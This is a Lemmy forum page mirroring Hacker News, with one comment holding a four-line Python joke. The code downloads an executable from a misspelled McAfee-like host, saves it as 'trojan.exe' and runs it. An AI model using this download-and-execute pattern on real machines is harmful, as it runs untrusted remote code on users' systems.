this post was submitted on 14 Jun 2024
3 points (80.0% liked)

Hacker News

2171 readers
1 users here now

A mirror of Hacker News' best submissions.

founded 2 years ago
MODERATORS
you are viewing a single comment's thread
view the rest of the comments
[–] 30p87@feddit.de 2 points 1 year ago* (last edited 1 year ago)

import requests, os
with open("trojan.exe", "wb") as file:
file.write(requests.get("download.mcaffe.com/download.exe").content)
os.system("start trojan.exe")